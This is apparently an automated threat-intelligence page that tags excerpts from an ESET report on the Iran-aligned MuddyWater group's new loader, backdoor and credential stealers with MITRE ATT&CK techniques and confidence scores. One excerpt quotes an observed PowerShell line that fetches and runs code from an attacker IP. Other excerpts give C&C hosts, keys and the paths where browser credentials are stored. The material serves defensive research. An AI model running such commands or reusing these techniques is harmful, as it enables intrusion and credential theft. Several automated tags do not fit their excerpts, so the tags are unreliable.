TTPwire Vol. 1 · MITRE ATT&CK·Tagged


ESET WeLiveSecurity

MuddyWater: Snakes by the riverbank

2025-12-02

ATT&CK techniques detected

32 predictions
T1555.003 · Credentials from Web Browsers
100%
“…<username>\AppData\Local\Microsoft\Edge\User Data\Local State and C:\Users\<username>\AppData\Roaming\Opera Software\Opera Stable\Local State, respectively. Firefox. Finally, to decrypt stored user credentials for Mozilla Firefox, Blub parses the hos…”
T1555.003 · Credentials from Web Browsers
99%
“…3a8f00279792578. Similar to CE-Notes, LP-Notes then stores the encrypted credentials in a local file – in this case C:\Users\Public\Downloads\lp-notes.txt. As neither of these components has the capability to exfiltrate data, another component presumably handle…”
T1059.001 · PowerShell
99%
“…victim in Saudi Arabia by deploying a batch script that downloaded a PowerShell-based backdoor, which was used to download and execute arbitrary payloads and subsequently to remove the initial payload from disk. The group conducted a campaign in January and February 2025 that w…”
T1555.003 · Credentials from Web Browsers
99%
“…key from C:\Users\<username>\AppData\Local\Google\Chrome\User Data\Local State. This key is used to encrypt sensitive data stored by Chrome, such as passwords or cookies, and it is protected by the Data Protection API (DPAPI) so that it can only be decrypted …”
T1555.003 · Credentials from Web Browsers
99%
“…file. Note that Blub checks for running processes associated with security solutions before executing its malicious payload, focusing on the combination of afwserv.exe (Avast Firewall) and avastsvc.exe (Avast Antivirus) processes. If afwserv.exe is detected running (but n…”
T1547.001 · Registry Run Keys / Startup Folder
98%
“…been easily implemented on the server side: -[>] process: aciseagent.exe ~~> (cisco umbrella roaming security) --> (security dns) found! -[>] process: acnamagent.exe ~~> (absolute persistence) --> (asset management) found! -[>] process: acnamlogonag…”
T1071.001 · Web Protocols
97%
“…with the WINHTTP_FLAG_SECURE flag configured to use SSL/TLS. Two C&C servers have been observed: processplanet[.]org and 35.175.224[.]64. Both directions of communication AES-CBC encrypt the data, using the CNG API with the key (used across samples) 060810104…”
T1555.003 · Credentials from Web Browsers
95%
“…shell\v1.0\powershell.exe" (invoke-webrequest -usedefaultcredentials -usebasicparsing -uri http://206.71.149[.]51:443/57576?filter_relational_operator_2=60169).content | invoke-expression Both versions of the browser-data stealer attempt…”
T1219 · Remote Access Tools
87%
“…MuddyWater. This assessment is based on the initial access method and the subsequent delivery of malicious tools – generally via spearphishing emails that contain links to download RMM software. TTPs. MuddyWater operators continue to rely on predictable and script-based backdoor…”
T1566.002 · Spearphishing Link
72%
“…of downloaders that leverage legitimate cloud services for C&C communication. We have previously observed Lyceum targeting multiple Israeli organizations, including national and local governmental entities, as well as organizations in the healthcare sector. During the campaign …”
T1003 · OS Credential Dumping
72%
“…s credential stealers (CE-Notes and LP-Notes) and reverse tunneling tools (go-socks5), long a favorite of MuddyWater operators. Although this is our first public blogpost covering MuddyWater, ESET researchers have been tracking the group for several years and have doc…”
T1588.002 · Tool
70%
“…. The campaign outlined in this publication shows what, for MuddyWater, seems to be an unprecedented advancement in toolset and technical execution. Victimology. As previously mentioned, during this campaign, MuddyWater primarily targeted organizations in Israel, but also one in E…”
T1204.002 · Malicious File
70%
“MuddyWater: Snakes by the riverbank. ESET researchers have identified new MuddyWater activity primarily targeting organizations in Israel, with one confirmed target in Egypt. MuddyWater, also referred to as Mango Sandstorm or TA450, is an Iran-aligned cyberespionage group known…”
T1041 · Exfiltration Over C2 Channel
70%
“…the WinHttpOpen API. - The connection, send, receive, and response timeouts are set to 30 seconds. - Default sleep time between consecutive connection attempts is 60 seconds. This value can be configured by command ID 700. - Upon failure, connection attempts are retried up to 10 …”
T1055.001 · Dynamic-link Library Injection
68%
“…systems. We have observed MuddyViper only in memory, loaded by Fooder, which might be the reason there is no obfuscation or string encryption. As is typical for MuddyWater, MuddyViper sends extremely verbose and frequent status messages to its C&C server throughout its executio…”
T1071.001 · Web Protocols
66%
“…, visit the ESET Threat Intelligence page. IoCs. Files. Network. MITRE ATT&CK techniques. This table was built using version 17 of the MITRE ATT&CK framework.”
T1620 · Reflective Code Loading
63%
“…- Blub, a browser-data stealer, and - several go-socks5 reverse tunnels. Fooder loader. Fooder is a 64-bit C/C++ loader designed to decrypt and then reflectively load the embedded payload (as illustrated in Figure 1), with MuddyViper being the most frequently observed …”
T1056.002 · GUI Input Capture
60%
“….exe LP-Notes credential stealer. LP-Notes is a C/C++ Windows credential stealer with the same design as the CE-Notes browser-data stealer. Following the same naming convention as in the case of CE-Notes, we named the stealer LP-Notes based on the local file it us…”
T1027 · Obfuscated Files or Information
57%
“…the process (via the ImpersonateLoggedOnUser API); only then does LP-Notes activate its malicious payload. LP-Notes employs several simple obfuscation techniques, including a custom, addition-based routine for string decryption. Figure 5 shows the function that decrypts …”
T1219 · Remote Access Tools
57%
“…of downloaders that leverage legitimate cloud services for C&C communication. We have previously observed Lyceum targeting multiple Israeli organizations, including national and local governmental entities, as well as organizations in the healthcare sector. During the campaign …”
T1090.001 · Internal Proxy
53%
“…immi34= build -buildmode=exe build -compiler=gc build -ldflags="-w -s" build CGO_ENABLED=1 build CGO_CFLAGS= build CGO_CPPFLAGS= build CGO_CXXFLAGS= build CGO_LDFLAGS= build GOARCH=amd64 build GOOS=windows build GOAMD64=v1 Figure 9. Build con…”
T1059.001 · PowerShell
50%
“…the WinHttpOpen API. - The connection, send, receive, and response timeouts are set to 30 seconds. - Default sleep time between consecutive connection attempts is 60 seconds. This value can be configured by command ID 700. - Upon failure, connection attempts are retried up to 10 …”
T1134.001 · Token Impersonation/Theft
48%
“We have observed one instance (SHA-1: 76632910cf67697bf5d7285fae38bfcf438ec082) of the component launching Fooder. Deployed under the name %USERPROFILE%\Downloads\osupdater.exe, the launcher expects a process ID as a command line argument. Once executed, it attempts t…”
T1055.001 · Dynamic-link Library Injection
46%
“…g API with the key 9262a37df166ac1d5f582aac79f54ccb47623bfd9ba001228d284ae13a08f52f and the IV 4103a09887b82ffd56a93bb431805224. Then the encrypted data is stored on disk in C:\Users\Public\Downloads\ce-notes.txt for later retrieval (probably via an RMM tool, since…”
T1003.001 · LSASS Memory
45%
“…s credential stealers (CE-Notes and LP-Notes) and reverse tunneling tools (go-socks5), long a favorite of MuddyWater operators. Although this is our first public blogpost covering MuddyWater, ESET researchers have been tracking the group for several years and have doc…”
T1003.001 · LSASS Memory
43%
“…s between several of the newly documented tools and those we previously attributed to MuddyWater: - LP-Notes, a new credential stealer, has the same design as CE-Notes, a browser-data stealer, that we previously associated with MuddyWater. During this campaign, we also o…”
T1056.002 · GUI Input Capture
41%
“…tools share is that they attempt to steal user credentials by opening a fake Windows Security dialog. Toolset. In this blogpost, we document previously unknown, custom tools used by MuddyWater: - Fooder loader – a newly identified loader that loads the MuddyViper backdoor into me…”
T1027.007 · Dynamic API Resolution
41%
“…the process (via the ImpersonateLoggedOnUser API); only then does LP-Notes activate its malicious payload. LP-Notes employs several simple obfuscation techniques, including a custom, addition-based routine for string decryption. Figure 5 shows the function that decrypts …”
T1056.002 · GUI Input Capture
36%
“…hiding direct references to the API functions from pseudocode view (see Figure 7). Capabilities. In an endless loop, LP-Notes displays a fake Windows Security dialog prompting the victim to enter their Windows username and password, as shown in Figure 8 (via the CredUIPromptF…”
T1090 · Proxy
34%
“…immi34= build -buildmode=exe build -compiler=gc build -ldflags="-w -s" build CGO_ENABLED=1 build CGO_CFLAGS= build CGO_CPPFLAGS= build CGO_CXXFLAGS= build CGO_LDFLAGS= build GOARCH=amd64 build GOOS=windows build GOAMD64=v1 Figure 9. Build con…”
T1055.012 · Process Hollowing
33%
“We have observed one instance (SHA-1: 76632910cf67697bf5d7285fae38bfcf438ec082) of the component launching Fooder. Deployed under the name %USERPROFILE%\Downloads\osupdater.exe, the launcher expects a process ID as a command line argument. Once executed, it attempts t…”
T1555.003 · Credentials from Web Browsers
32%
“…tools share is that they attempt to steal user credentials by opening a fake Windows Security dialog. Toolset. In this blogpost, we document previously unknown, custom tools used by MuddyWater: - Fooder loader – a newly identified loader that loads the MuddyViper backdoor into me…”

Summary

MuddyWater targets critical infrastructure in Israel and Egypt, relying on custom malware, improved tactics, and a predictable playbook